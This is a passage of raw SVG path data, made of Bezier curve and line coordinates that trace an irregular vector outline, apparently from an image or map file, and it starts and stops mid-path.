243.21486,259.04742 235.72188,255.63276 C 231.57997,253.74523 226.76773,251.88826 225.028,251.50615 C 223.28827,251.12404 221.62212,250.17884 221.32544,249.4057 C 221.02876,248.63257 220.25918,248 219.61525,248 C 217.32825,248 215.24926,244.27125 215.35198,240.35366 C 215.44071,236.96983 214.84748,235.84858 210.97731,232.08516 C 208.51479,229.69056 205.4875,227.06504 204.25,226.25066 C 203.0125,225.43629 202,223.92173 202,222.88499 C 202,221.84825 201.58795,221 201.08433,221 C 200.58071,221 198.48137,219.21939 196.41911,217.04309 C 194.35686,214.8668 192.38362,213.26291 192.03414,213.4789 C 191.68466,213.69489 190.82626,211.93281 190.12659,209.56316 C 189.30682,206.78678 188.02682,204.87762 186.527,204.19425 C 185.2469,203.611 183.97617,203.35716 183.70317,203.63016 C 182.55651,204.77682 184.71985,209.17985 187.0161,210.37293 C 188.38224,211.08275 189.3875,212.18922 189.25,212.83175 C 189.1125,213.47429 189.45,214 190,214 C 190.55,214 191,214.6199 191,215.37756 C 191,216.13521 191.74661,217.37271 192.65914,218.12756 C 193.57166,218.8824 195.30564,221.62852 196.51243,224.23004 C 197.71921,226.83156 198.93665,228.73002 199.21783,228.44883 C 199.49902,228.16765 200.44837,229.03536 201.32751,230.37708 C 202.68679,232.45162 202.71749,232.98957 201.5327,233.97286 C 200.437,234.88221 199.9047,234.69045 199.04009,233.07492 C 198.43543,231.9451 196.60405,230.32949 194.97036,229.48467 C 192.88284,228.40517 192,227.20842 192,225.45814 C 192,223.55513 191.1154,222.55865 188.25,221.23382 C 182.66355,218.65091 180.25769,216 183.5,216 C 185.79901,216 185.29193,214.37381 182.25,211.99126 C 180.7375,210.80662 177.88255,206.83645 175.90568,203.16868 C 173.9288,199.50091 171.8138,196.5 171.20568,196.5 C 170.59755,196.5 169.5375,195.9375 168.85,195.25 C 168.1625,194.5625 166.34,194 164.8,194 C 163.12118,194 162,193.46143 162,192.65499 C 162,191.91523 161.1,190.49549 160,189.5 C 158.9,188.50451 158,187.19235 158,186.58408 C 158,185.97582 156.43363,183.68306 154.51918,181.48907 C 152.60474,179.29508 151.02974,176.7125 151.01918,175.75 C 151.00863,174.7875 150.56125,174 150.025,174 C 149.4842,174 149.30632,172.71841 149.62557,171.12217 C 149.94213,169.53936 149.72837,167.36097 149.15054,166.28129 C 148.38634,164.85337 148.49213,163.01517 149.53862,159.53795 C 151.55214,152.8475 149.55113,145.02777 145.33386,143.10625 C 144.10594,142.54678 141.23735,140.91238 138.95923,139.47426 C 135.22375,137.11616 134.96058,136.69462 136.2781,135.17975 C 137.78017,133.45269 137.52096,130.56 135.95106,131.53024 C 135.4681,131.82873 134.20096,131.20096 133.13519,130.13519 C 132.06943,129.06943 130.21188,127.88463 129.0073,127.50232 C 127.47473,127.0159 126.96662,126.23565 127.31496,124.9036 C 127.58875,123.85662 127.40489,123 126.90638,123 C 126.40787,123 126,121.8199 126,120.37756 C 126,118.12556 125.78168,117.9363 124.45449,119.03777 C 123.60446,119.74323 123.14034,120.92333 123.42311,121.66021 C 124.32783,124.01788 120.1141,123.14644 117.81305,120.5 C 116.6175,119.125 115.11559,118 114.47547,118 C 113.83534,118 111.55399,116.24702 109.4058,114.10449 C 105.47343,110.18248 98.661301,106 96.205792,106 C 95.477688,106 95.090552,105.6625 95.345492,105.25 C 95.600431,104.8375 93.939488,104.47879 91.654508,104.45286 C 89.369529,104.42694 83.680164,104.12342 79.011477,103.77837 C 74.342789,103.43333 70.067789,103.50819 69.511477,103.94472 C 68.955164,104.38125 66.475,104.99305 64,105.30427 C 61.525,105.61549 57.800512,106.18517 55.723361,106.57023 C 51.969719,107.26607 51.952823,107.25428 52.94861,104.63517 C 54.010916,101.84109 52.711748,100.90576 51.292085,103.44256 C 50.848073,104.23596 49.363212,105.33244 47.992395,105.87917 C 45.855725,106.73135 45.785448,106.88545 47.5,106.95885 C 49.345307,107.03785 49.306634,107.19572 47,109 C 45.625,110.07554 44.076175,110.96553 43.558167,110.97776 C 43.040159,110.98999 39.665159,112.74553 36.058167,114.87895 C 32.451175,117.01237 28.04266,119.07199 26.261468,119.45589 C 24.480275,119.83978 22.765465,120.57047 22.450779,121.07964 C 22.106765,121.63627 21.105343,121.59156 19.939312,120.96752 C 18.87269,120.39668 18,120.33584 18,120.83231 C 18,121.70292 7.8618827,124.17301 7.1498645,123.47588 C 6.3910838,122.73296 8.2098333,121 9.7483095,121 C 10.644961,121 15.972631,119.14193 21.587577,116.87095 C 28.826514,113.94314 32.096235,112.0842 32.826613,110.4812 C 33.741666,108.47288 33.596277,108.2361 31.524288,108.36025 C 30.241485,108.43711 29.447557,108.91397 29.760004,109.41994 C 30.098018,109.96731 29.552912,109.99498 28.414045,109.48826 C 27.36132,109.01987 24.047341,108.68818 21.049647,108.75116 C 18.051953,108.81415 16.042009,108.5584 16.583105,108.18284 C 17.124201,107.80728 17.541497,106.825 17.510429,106 C 17.468259,104.88016 16.428126,104.56284 13.406341,104.74797 C 9.9974617,104.95681 8.7386718,104.43769 5.429369,101.4583 C 1.9081095,98.288093 1.6833497,97.814876 3.2653318,96.902064 C 4.2362644,96.341832 5.8343695,95.020783 6.8166766,93.9664 C 7.8205567,92.888861 9.893968,92.06536 11.551345,92.085921 C 15.598789,92.136135 21,90.940021 21,89.993489 C 21,88.718092 18.843387,88.358706 12.5,88.57702 C 4.2825696,88.859832 -1.2047343e-014,87.491171 2.1566082e-014,84.582163 C 4.3808232e-014,82.657259 0.84836051,82.115911 5.6821926,80.956293 C 10.056035,79.907024 11.45675,79.870249 11.765526,80.796578 C 11.986153,81.45846 13.329167,82 14.75,82 C 16.170833,82 17.035099,81.701766 16.670591,81.337257 C 15.627777,80.294443 2.7091127,75 1.2074166,75 C 0.1402633,75 0.17165735,74.685486 1.3571429,73.5 C 2.2206593,72.636484 4.6634737,72 7.1141202,72 C 10.078013,72 12.058052,71.35464 13.632627,69.875403 C 14.876468,68.706875 17.830472,67.354176 20.197078,66.869405 C 22.563685,66.384634 26.75,65.507988 29.5,64.921302 C 34.949264,63.758755 41.665601,63.675296 43.402164,64.748551 C 44.005313,65.121317 45.726306,65.29755 47.226594,65.14018 C 48.726882,64.982809 51.427152,65.34233 53.227195,65.939115 C 55.027238,66.5359 63.25,67.459657 71.5,67.991908 C 87.067066,68.996222 89.94493,69.297447 101.28136,71.109116 C 106.10216,71.879527 108.4357,71.883294 109.35282,71.122145 C 110.06239,70.533262 113.31077,69.815239 116.57147,69.526539 C 119.83216,69.237838 124.60479,68.627568 127.17731,68.170382 C 129.74983,67.713196 132.53577,67.720328 133.36829,68.186231 C 134.38919,68.757555 135.1819,68.497379 135.80328,67.387039 C 136.62807,65.91322 137.13187,66.017728 140.61229,68.38461 C 144.10094,70.757084 144.62056,70.864018 145.67449,69.426369 C 146.97269,67.655523 150.64064,67.939265 150.25945,69.781047 C 150.08555,70.621271 150.72702,70.674085 152.57455,69.971657 C 155.79524,68.747151 160.61188,68.721917 162.84649,69.917844 C 163.78974,70.422658 167.92266,71.098221 172.03075,71.419095 C 177.98845,71.884438 178.94348,71.783015 176.75,70.917918 C 173.24046,69.533773 173.24046,68.247906 176.75,67.716254 C 179.13987,67.35422 179.04165,67.278037 176,67.134519 C 172.25006,66.957581 170.30948,66.106137 169.99549,64.5 C 169.88797,63.95 169.395,63.6125 168.9,63.75 C 167.59847,64.111535 167.79521,62.615015 169.25,61.087605 C 170.27176,60.014841 170.04352,59.905465 168,60.488581 C 166.625,60.880934 165.00039,61.831512 164.38976,62.600975 C 163.77912,63.370439 162.20412,64.006891 160.88976,64.015313 C 159.57539,64.023735 157.86227,64.434288 157.08282,64.927652 C 156.15238,65.516588 154.44018,65.16787 152.09763,63.91234 C 150.13522,62.860553 147.17295,61.984054 145.51481,61.964565 C 142.54423,61.929649 142.53347,61.910546 144.78136,60.662595 C 146.03611,59.966002 146.77979,59.113127 146.43399,58.767319 C 146.08818,58.42151 146.72618,57.563438 147.85178,56.860492 C 149.27773,55.969969 149.59917,55.221957 148.9118,54.393727 C 147.5356,52.735506 158.05374,51.635251 164.11784,52.803092 C 166.65765,53.292216 170.08562,53.494278 171.73556,53.25212 C 173.38549,53.009961 176.12262,53.529169 177.81806,54.405915 C 179.5135,55.282662 181.76793,56 182.8279,56 C 183.88786,56 185.27676,56.628544 185.91432,57.396765 C 186.55189,58.164986 187.94312,58.56613 189.00594,58.288195 C 190.06877,58.01026 192.30222,58.258307 193.96918,58.83941 C 196.10371,59.583513 197,59.582042 197,58.834437 C 197,58.143028 198.56899,58.008197 201.5,58.447729 C 204.43044,58.887176 206,58.752384 206,58.061273 C 206,57.477573 206.87344,57 207.94098,57 C 209.00852,57 210.16008,56.55 210.5,56 C 211.18823,54.886427 218.28703,54.620367 219.33552,55.668848 C 219.70338,56.036715 219.21588,57.215248 218.25218,58.287811 C 216.57325,60.156399 216.59406,60.300758 218.75,61.740934 C 219.9875,62.56759 221,63.864057 221,64.621972 C 221,65.379887 221.3375,66.031005 221.75,66.0689 C 224.73973,66.343556 228.30318,66.961451 229.99605,67.498747 C 232.30346,68.23109 232.70046,70 230.55742,70 C 229.6456,70 229.2588,70.747534 229.50611,72.031733 C 229.87523,73.94839 229.51798,74.035711 223.19869,73.573428 L 216.5,73.083389 L 222,74.866376 C 225.025,75.847019 228.4,76.560687 229.5,76.452305 C 230.6,76.343923 233.1875,76.197816 235.25,76.127623 C 237.85995,76.038799 239,75.543978 239,74.5 C 239,73.675 238.55,73 238,73 C 235.59736,73 237.32642,71.212392 240.85567,70.047633 C 243.97894,69.01686 245.16615,69.017556 247.10567,70.051293 C 249.17837,71.156015 249.33837,71.131344 248.29679,69.867633 C 246.42964,67.602302 247.17178,63.878854 249.72204,62.716878 C 252.09604,61.635213 252.61027,60.495199 251.13535,59.583653 C 250.6598,59.289744 250.3223,58.025686 250.38535,56.774636 C 250.49246,54.649579 250.99242,54.480363 257.98822,54.201382 C 262.10675,54.037142 266.57717,54.179029 267.92251,54.516687 C 270.26767,55.105285 270.19774,55.227638 266.22725,57.482921 C 263.67191,58.934382 261.24366,59.614975 259.88659,59.260093 C 258.37365,58.864449 257.91052,59.046207 258.40265,59.842476 C 258.79677,60.480182 258.56417,61 257.8847,61 C 256.21292,61 260.82698,65.81031 263.23049,66.573154 C 264.34424,66.926644 264.92037,67.765118 264.60831,68.578346 C 264.31333,69.34706 264.39328,69.928117 264.78599,69.869583 C 266.67793,69.587584 270.35446,70.217101 269.30618,70.643555 C 268.64957,70.910668 268.36767,71.794569 268.67973,72.607779 C 269.16652,73.876325 269.51422,73.844611 271.12762,72.384508 C 272.66499,70.993205 273.46356,70.890181 275.50406,71.819897 C 278.12384,73.013549 278.88567,74.977466 276.75,75.031803 C 276.04588,75.049718 276.34771,75.70478 277.44113,76.531803 C 280.01808,78.48091 281.15241,78.385567 280.79384,76.25 C 280.6245,75.241474 281.13555,74.484324 282,74.463001 C 282.825,74.442652 284.28472,73.976317 285.24383,73.426701 C 286.83693,72.513777 286.85364,72.236053 285.43713,70.2137 C 284.36594,68.684371 282.85984,68 280.56542,68 C 276.31219,68 270.42477,65.549309 269.61623,63.442307 C 269.20612,62.373554 270.15209,60.647907 272.35653,58.443468 L 275.72316,55.076835 L 288.36158,55.176082 C 296.90188,55.243147 301.00497,55.636014 301.01531,56.387665 C 301.02623,57.180815 301.24144,57.173186 301.76531,56.361077 C 303.63308,53.465634 321.21387,56.226901 319.41746,59.133552 C 318.95778,59.877333 319.12323,60.041872 319.86799,59.581588 C 320.51534,59.181502 323.02246,59.959384 325.43936,61.310216 C 328.56856,63.059162 330.14268,63.457316 330.90685,62.69315 C 331.67102,61.928984 332.96153,62.088097 335.38927,63.245805 C 337.26438,64.139983 340.53139,65.193368 342.64928,65.586659 C 344.76718,65.97995 347.56703,66.996327 348.87118,67.845274 C 351.08435,69.285962 351.11767,69.437813 349.37118,70.124123 C 347.76955,70.753506 347.86014,70.879679 350,71 C 352.28892,71.128702 352.33113,71.20977 350.5,71.960152 C 348.64168,72.721676 348.69942,72.858374 351.3151,73.889867 C 352.8634,74.50044 355.3958,75 356.94265,75 C 358.48951,75 360.31531,75.675 361,76.5 C 361.68469,77.325 362.75229,78.00251 363.37244,78.005577 C 363.9926,78.008644 366.25685,78.498944 368.40411,79.095132 L 372.30821,80.17911 L 369.40411,82.553592 C 367.80685,83.859557 365.9375,84.944257 365.25,84.964037 C 364.5625,84.983817 364,85.45 364,86 C 364,87.869922 359.47731,87.008863 355.65436,84.411103 C 353.55892,82.98721 351.59886,82.067802 351.29869,82.367975 C 350.21457,83.452097 351.98021,86 353.81561,86 C 356.65429,86 359.59549,89.097411 360.33551,92.86617 C 360.95232,96.00748 360.84629,96.186812 358.74823,95.550793 C 352.5731,93.678818 352.44213,93.666062 353.75,95.063956 C 355.64667,97.091186 355.25233,98.088125 352.75,97.592072 C 351.5125,97.346754 347.575,96.60142 344,95.935774 C 340.425,95.270128 335.36159,93.440869 332.74798,91.870754 C 328.08131,89.067273 323.42284,88.323111 316.75267,89.315599 C 315.24164,89.540433 313.21664,89.139224 312.25267,88.424023 C 310.59676,87.195448 310.61042,87.041491 312.5,85.635327 C 313.86287,84.621122 316.16367,84.26666 319.72242,84.522634 C 322.59475,84.729236 325.20881,84.471162 325.53144,83.949137 C 325.85406,83.427112 325.52898,82.980112 324.80902,82.955804 C 324.08906,82.931496 325.1875,82.020746 327.25,80.931914 C 329.3125,79.843083 331,78.366709 331,77.651084 C 331,75.908926 323.84764,76.05762 322.45586,77.828712 C 321.27134,79.336062 314.8405,79.070149 314.32451,77.492484 C 314.14327,76.93835 315.15521,75.233719 316.57326,73.704415 L 319.15154,70.923863 L 316.57577,71.570339 C 314.912,71.987918 314,71.804286 314,71.051704 C 314,70.282351 313.24507,70.415364 311.77749,71.443296 C 310.55512,72.299483 308.86762,72.964474 308.02749,72.921053 C 306.99944,72.867918 306.90871,72.677189 307.75,72.337719 C 309.75503,71.528673 309.18851,69.805393 307.13208,70.458079 C 306.10473,70.784149 304.15466,70.629102 302.79861,70.113531 C 301.33343,69.556472 299.75831,69.539926 298.91653,70.072751 C 297.83616,70.756592 298.03396,70.973008 299.75,70.984687 C 301.07653,70.993715 302,71.615648 302,72.5 C 302,73.325 301.325,74 300.5,74 C 298.5882,74 298.54261,75.887254 300.43686,76.614144 C 302.83665,77.535029 301.01959,79.905699 297.3924,80.586163 C 294.11992,81.200085 291.62609,83 294.04797,83 C 294.68927,83 294.95672,83.670413 294.64229,84.489807 C 294.25887,85.488973 294.8823,86.183339 296.5353,86.598215 C 297.89088,86.938445 299,87.618032 299,88.108408 C 299,88.598784 300.09844,89 301.44098,89 C 304.00847,89 306.06159,90.87926 303.80902,91.167506 C 299.92659,91.664313 296.41859,91.386435 295.80728,90.533665 C 295.39363,89.956631 293.41818,90.520749 290.90375,91.93394 C 287.10182,94.070744 286.57916,94.144955 285.52126,92.698186 C 284.78322,91.68886 283.54469,91.306306 282.17479,91.664542 C 280.13937,92.196816 278.97218,90.561458 280.86782,89.833333 C 281.34511,89.65 282.06971,88.426767 282.47804,87.115037 L 283.22045,84.730075 L 279.7683,87.363156 C 277.86962,88.811351 275.12005,90.09523 273.65815,90.216221 C 272.19624,90.337211 269.84018,91.432931 268.42245,92.651153 C 267.00471,93.869375 263.85637,95.683729 261.42612,96.683051 C 258.99588,97.682373 257.00581,98.869643 257.00375,99.321429 C 257.00169,99.773214 256.30105,100.8418 255.44678,101.69607 C 253.06392,104.07894 254.00264,107.44243 257.15229,107.80699 C 258.92787,108.01251 260.1743,109.00415 260.9231,110.80699 C 261.94917,113.27742 262.54104,113.51458 268.0841,113.67646 C 272.02983,113.79169 275.05887,114.48357 276.81329,115.67034 C 280.77358,118.34928 286.79522,119.96765 292.86663,119.98482 C 297.82004,119.99883 298.19105,120.16143 297.68503,122.09645 C 296.92932,124.98628 297.87365,127 299.98454,127 C 300.95836,127 302.37271,127.74964 303.12756,128.66587 C 304.36701,130.17032 304.2254,130.26334 301.66621,129.62579 C 299.80091,129.16111 299.05211,129.2753 299.47523,129.95992 C 299.82877,130.53196 300.74412,131 301.50933,131 C 302.27454,131 303.33292,131.77248 303.86129,132.71662 C 304.70684,134.22754 305.12706,134.26996 307.36803,133.07063 C 309.42935,131.96744 309.72519,131.35502 308.92187,129.85401 C 308.37614,128.8343 308.18202,128 308.4905,128 C 308.79897,128 308.3585,126.66016 307.51167,125.02257 C 305.99856,122.09653 306.01969,122.03369 308.73599,121.38223 C 314.11672,120.09174 317,118.05581 317,115.5469 C 317,113.33485 313.71234,109.76852 310.69982,108.7127 C 309.85878,108.41794 310.0233,107.70167 311.25,106.31736 C 313.23945,104.0723 313.54067,102 311.87756,102 C 311.10205,102 311.1399,101.53636 312,100.5 C 312.99593,99.299981 312.98328,98.684777 311.93675,97.423785 C 309.85407,94.914313 312.57499,93.951183 320,94.56962 C 328.26429,95.257963 334.64224,96.863998 336.10344,98.624641 C 336.73124,99.381088 338.58793,100 340.22943,100 C 342.47152,100 343.07079,100.37315 342.63837,101.5 C 341.75341,103.80617 342.96005,105.92798 346.07152,107.53699 C 350.23149,109.68819 351.52894,109.3859 355.44573,105.35291 L 358.98773,101.70583 L 363.89212,106.10291 C 366.58953,108.52131 368.84229,111.0625 368.89825,111.75 C 368.95421,112.4375 369.45,113 370,113 C 370.55,113 371,113.94213 371,115.09362 C 371,116.34624 371.8034,117.39733 373,117.71025 C 374.1,117.99791 375,118.63078 375,119.11663 C 375,119.60248 375.83285,120 376.85078,120 C 380.12407,120 385,122.15269 385,123.59783 C 385,124.36902 385.8449,125 386.87756,125 C 389.36228,125 390.63727,126.74376 391.26458,131 C 391.65376,133.64054 391.25488,135.1139 389.64022,137 C 388.4631,138.375 387.89667,139.17833 388.38148,138.78518 C 388.8663,138.39203 390.2163,138.58771 391.38148,139.22003 C 392.54667,139.85234 394.56904,140.39901 395.87565,140.43484 C 398.9927,140.52033 402.39344,146.39634 400.91964,149.15016 C 399.68172,151.46323 394.48692,151.77945 395.36615,149.48821 C 395.88002,148.1491 395.60669,148.15203 392.97314,149.51389 C 390.23944,150.92754 389.5641,150.76067 389.88158,148.75 C 389.99544,148.02887 384.83249,147.59485 380.34551,147.94836 C 377.00743,148.21135 376.71183,146.41353 379.58436,143.31911 C 382.31285,140.37987 385.41531,135.08198 384.78007,134.44673 C 384.16467,133.83134 380,135.18055 380,135.99531 C 380,137.79943 373.79032,139.23098 368.73627,138.59199 L 363.5,137.92997 L 366.86278,140.01887 C 368.71231,141.16777 369.97079,142.36254 369.65941,142.67393 C 368.78162,143.55171 362,142.0295 362,140.95469 C 362,140.42961 361.2125,139.95514 360.25,139.90032 C 359.04239,139.83153 359.27484,139.52642 361,138.91588 C 362.77493,138.28773 361.76629,138.15749 357.52223,138.46682 C 354.03466,138.72101 351.11862,139.4801 350.52223,140.28903 C 349.96,141.05161 348.825,141.97853 348,142.34886 C 347.175,142.71918 347.625,142.78609 349,142.49754 C 357.38266,140.73841 359.95985,140.73179 360.62598,142.46771 C 361.01952,143.49326 360.72113,144.56296 359.89572,145.08561 C 359.12807,145.57168 358.8926,145.97627 359.37244,145.98469 C 359.85229,145.99311 359.71794,146.63494 359.07389,147.41097 C 357.80101,148.9447 359.235,150.59083 360.9309,149.54271 C 361.4429,149.22627 362.14446,149.42472 362.48992,149.98369 C 362.83538,150.54266 364.44148,151 366.05902,151 C 367.67656,151 368.94671,151.3375 368.88158,151.75 C 368.52312,154.02023 369.22527,153.98333 371.07258,151.63486 C 373.38399,148.69638 375,148.22942 375,150.5 C 375,151.325 375.45,152 376,152 C 376.55,152 377,152.34015 377,152.75589 C 377,153.6508 373.57322,155.22849 365.91183,157.86087 C 362.83834,158.9169 359.41045,160.35123 358.2943,161.04828 C 357.17815,161.74533 355.53032,162.03375 354.63247,161.68921 C 352.17636,160.74671 352.6705,158.07577 355.5,157 C 356.875,156.47723 358,155.85549 358,155.61837 C 358,154.88992 353.61945,156.25182 351.43134,157.66055 C 350.29357,158.39306 348.15607,159.09225 346.68134,159.2143 C 345.2066,159.33635 344,159.68941 344,159.99887 C 344,160.30833 342.7516,161.03274 341.22577,161.60868 C 338.35652,162.6917 337.138,166.34922 339.21814,167.63482 C 339.87131,168.0385 340.02272,167.84577 339.59549,167.15451 C 339.20305,166.51953 339.35852,166 339.94098,166 C 340.52344,166 341,166.62391 341,167.38646 C 341,168.26302 339.34506,169.02109 336.5,169.44773 C 334.025,169.81888 332,170.54497 332,171.06127 C 332,171.57757 331.09035,172 329.97856,172 C 328.79278,172 327.48623,173.03349 326.81805,174.5 C 325.76116,176.81961 324.74842,177.45371 322.67567,177.09364 C 322.22229,177.01489 322.14858,177.43139 322.51187,178.0192 C 322.87515,178.60701 322.41174,180.24885 321.48206,181.66772 C 320.21216,183.60584 320.03892,184.79001 320.78556,186.4287 C 321.57924,188.17064 321.34848,189.02324 319.63969,190.66225 C 318.46286,191.79104 316.4875,193.03413 315.25,193.42468 C 314.0125,193.81523 313,194.55445 313,195.06739 C 313,195.58032 312.35389,196 311.56421,196 C 310.77452,196 308.03732,197.90306 305.48154,200.22903 C 300.23529,205.00354 300.10016,206.24327 303.78977,215.74958 C 306.03684,221.53914 305.56214,226.26764 302.67808,226.82332 C 301.75514,227.00115 301,226.63925 301,226.01909 C 301,225.39893 299.64079,223.45344 297.97953,221.69577 C 296.31827,219.93809 295.05796,217.6 295.17883,216.5 C 295.29971,215.4 294.81743,213.43955 294.10709,212.14344 C 293.04221,210.20042 292.28019,209.89396 289.76463,210.39707 C 287.9273,210.76454 286.11229,210.50859 285.20185,209.75363 C 284.37034,209.06413 281.26431,208.5 278.29956,208.5 C 273.28663,208.5 272.9468,208.65026 273.44739,210.64554 C 273.93512,212.58961 273.6342,212.76187 270.24283,212.48003 C 268.18428,212.30894 264.6914,211.65259 262.48089,211.02145 C 258.16671,209.78969 256.98535,210.08775 249.5,214.2966 C 245.88084,216.33158 245.5,216.92438 245.5,220.52286 C 245.5,222.71029 245.12346,225.08269 244.66325,225.79487 C 243.57975,227.4716 243.50347,234.65951 244.52842,238.5 C 245.6555,242.72316 248.95065,246.88459 252.48626,248.54989 C 255.09242,249.77742 256.23183,249.77509 260.91135,248.53265 C 266.38865,247.07839 267.95692,245.82343 267.98469,242.87244 C 268.00904,240.28451 270.34097,239.01175 275.91701,238.543 C 282.46338,237.99269 283.07293,239.21784 279.75738,246.26176 C 278.40128,249.14279 277.00132,253.07769 276.64634,255.00599 L 276.00093,258.51198 L 282.95327,258.20201 C 292.46308,257.77803 296.61148,260.54531 293.89359,265.5 C 292.95067,267.21893 292.98996,276.11273 293.94839,277.90357 C 294.45091,278.84253 296.42573,280.45286 298.33688,281.48209 C 301.60105,283.23996 301.96555,283.25259 304.34966,281.69046 C 307.42522,279.67528 312.61785,280.41522 314.29973,283.10834 C 315.39069,284.85524 315.53982,284.84149 317.72021,282.79312 C 318.97409,281.61516 320,279.90067 320,278.98316 C 320,278.03823 321.62588,276.54399 323.75,275.53678 C 325.8125,274.55879 329.2361,272.87152 331.35799,271.7873 C 334.27882,270.29484 335.49339,270.0976 336.35799,270.97531 C 337.21638,271.84672 337.01791,272.49045 335.55887,273.56732 C 334.49125,274.35529 334.11694,275 334.72708,275 C 336.95435,275 339,273.75191 339,272.39301 C 339,271.62686 339.45,271 340,271 C 340.55,271 341,271.45 341,272 C 341,272.55 341.66088,273 342.46862,273 C 343.27635,273 343.80011,272.4375 343.63251,271.75 C 343.46491,271.0625 343.55404,270.95 343.83056,271.5 C 344.10709,272.05 344.25833,272.6125 344.16667,272.75 C 344.075,272.8875 344.94404,273.94404 346.09787,275.09787 C 347.56142,276.56142 348.99764,277.04029 350.84787,276.68163 C 352.41103,276.37861 354.15917,276.75893 355.10538,277.60787 C 356.93134,279.24612 360,278.48447 360,276.39301 C 360,275.62686 360.675,275 361.5,275 C 362.325,275 363,275.38394 363,275.85321 C 363,276.32247 365.26972,276.48832 368.04381,276.22177 C 371.98697,275.84288 373.02351,276.03858 372.79381,277.11856 C 372.63222,277.87835 372.05,278.83061 371.5,279.23469 C 370.88069,279.68968 370.97587,279.9752 371.75,279.98469 C 372.4375,279.99311 373,280.9 373,282 C 373,283.30232 373.66667,284 374.91111,284 C 375.96221,284 377.87471,285.24765 379.16111,286.77255 C 383.15853,291.51115 386.09621,292.99935 391.47251,293.00938 C 398.54257,293.02258 406.53389,297.60133 407.54839,302.2203 C 407.94435,304.0231 409.1688,306.27911 410.2694,307.23365 C 411.82872,308.58604 412.016,309.2758 411.11775,310.35812 C 410.20811,311.45416 410.4885,312.09006 412.44733,313.37353 C 413.8126,314.26809 415.42202,315 416.02383,315 C 416.62564,315 416.86586,315.40803 416.55764,315.90674 C 416.24942,316.40545 416.86813,316.58574 417.93256,316.30739 C 420.55208,315.62236 426.99753,317.78848 429.71912,320.26848 C 430.93964,321.38065 433.18964,322.42398 434.71912,322.58698 C 443.90367,323.56583 448.09608,324.90019 452.77256,328.33304 C 455.52003,330.34987 458.66557,332 459.76266,332 C 461.62506,332 462.46061,333.31728 464.39566,339.30416 C 465.05464,341.34298 460.78211,350.46076 458.58997,351.6938 C 457.80165,352.13721 455.61368,354.525 453.7278,357 C 450.74001,360.92115 450.23191,362.44181 449.77787,368.8216 C 449.49128,372.84848 448.74902,376.65098 448.1284,377.2716 C 447.50778,377.89222 446.98999,379.5475 446.97776,380.95 C 446.96553,382.3525 446.07554,384.625 445,386 C 443.92446,387.375 443.03447,389.25718 443.02224,390.18261 C 443.01001,391.10805 442.10914,392.14797 441.02031,392.49355 C 439.93149,392.83913 439.14399,393.62551 439.27031,394.24105 C 439.4005,394.87542 437.98387,395.42749 436,395.51551 C 426.49045,395.93742 415.70812,402.63488 416.10347,407.87425 C 416.47822,412.84063 416.00009,415 414.52568,415 C 413.7148,415 412.31217,416.4625 411.40871,418.25 C 409.18594,422.64776 405.93105,426.07542 404.70013,425.31467 C 404.1451,424.97164 403.97567,425.15162 404.32362,425.71461 C 404.67157,426.27761 403.48103,428.25964 401.67798,430.11912 C 399.87493,431.9786 398.0989,434.2875 397.73124,435.25 C 397.36358,436.2125 396.26115,437.04768 395.28138,437.10596 C 392.2859,437.28414 387.60794,436.91252 385.5,436.32893 C 383.93882,435.8967 383.75712,436.04602 384.67186,437.00946 C 385.31638,437.6883 385.60573,438.86388 385.31487,439.62186 C 385.00077,440.44038 385.43857,441 386.39301,441 C 388.41691,441 388.47994,443.35679 386.5,445 C 385.675,445.68469 385,446.81991 385,447.5227 C 385,448.87074 377.68677,450.98765 371.91833,451.30936 C 368.89924,451.47773 368.48694,451.83352 368.38818,454.35558 C 368.24641,457.97592 366.43334,459.19219 361.96429,458.66494 C 358.99349,458.31444 358.42857,458.55628 358.42857,460.17852 C 358.42857,461.66344 358.93228,461.98283 360.61003,461.56174 C 364.45764,460.59605 364.42244,463.83091 360.56533,465.67024 C 358.45229,466.67787 357.37128,467.80397 357.69848,468.65665 C 358.42245,470.54326 356.44684,472.67103 353.219,473.48117 C 351.73457,473.85374 350.20377,474.6703 349.81722,475.29575 C 348.78814,476.96083 350.8829,479 353.62244,479 C 355.24528,479 356,479.57139 356,480.8 C 356,483.09708 354.10572,485 351.81905,485 C 350.77846,485 349.79035,485.98711 349.44213,487.37453 C 349.11435,488.68052 347.75578,490.24588 346.42308,490.85309 C 343.76396,492.06467 343.32248,493.92248 345.23839,495.83839 C 345.91951,496.51951 346.48201,497.79673 346.48839,498.67666 C 346.50671,501.20092 351.27511,504.12353 357.64722,505.51604 C 362.5294,506.58295 362.96103,506.83278 360.25,507.02253 C 358.4625,507.14764 356.6625,507.32655 356.25,507.42011 C 345.70707,509.8114 343.57528,509.89322 338,508.1206 z M 335.60417,279.27083 C 334.58765,278.25432 333.74892,279.78472 334.58295,281.13421 C 335.21298,282.15363 335.44853,282.15442 335.78725,281.13825 C 336.01885,280.44346 335.93646,279.60312 335.60417,279.27083 z M 369.49292,278.01145 C 369.84326,277.44459 369.44186,277.27695 368.55194,277.61844 C 366.81952,278.28323 366.50255,279 367.94098,279 C 368.45852,279 369.1569,278.55515 369.49292,278.01145 z M 303,165.83222 C 303,164.65241 300.24351,164.79698 299.48992,166.01631 C 299.14446,166.57528 298.49005,166.80287 298.03569,166.52206 C 297.58132,166.24124 296.97175,166.63125 296.68107,167.38873 C 296.24927,168.51398 296.77901,168.57371 299.57629,167.71521 C 301.45933,167.13728 303,166.28994 303,165.83222 z M 281.88119,166.64316 C 282.51935,165.87422 282.74063,163.95316 282.39189,162.20945 C 281.89596,159.72978 282.29521,158.61388 284.44886,156.46023 C 287.56425,153.34484 287.29784,152.45154 283.73719,154.07388 C 280.76714,155.42713 278.01935,161.6504 278.73619,165.40029 C 279.29074,168.30125 280.20518,168.66262 281.88119,166.64316 z M 308.52646,164.19313 C 308.21857,163.88524 307.41167,164.19249 306.73333,164.87591 C 305.75307,165.86353 305.86793,165.97839 307.29313,165.43571 C 308.27935,165.06018 308.83435,164.50102 308.52646,164.19313 z M 299.27666,158.16464 C 299.44398,155.78077 299.87626,155.13426 301,155.58723 C 305.72762,157.49289 305.59594,157.49229 304.05601,155.60103 C 303.07285,154.39355 301.76923,153.99615 299.97112,154.35578 C 298.51862,154.64628 296.13092,154.26175 294.66511,153.50128 C 292.20391,152.2244 290.73934,153.10283 293,154.5 C 293.55,154.83992 294,155.94333 294,156.95203 C 294,157.96073 294.675,159.04504 295.5,159.36163 C 296.325,159.67821 297,160.71635 297,161.66862 C 297,164.72922 299.03582,161.59592 299.27666,158.16464 z M 317.37804,161.19733 C 317.96375,160.24964 309.27283,160.39384 308.31903,161.34764 C 307.96023,161.70644 309.74011,162 312.27432,162 C 314.80852,162 317.1052,161.6388 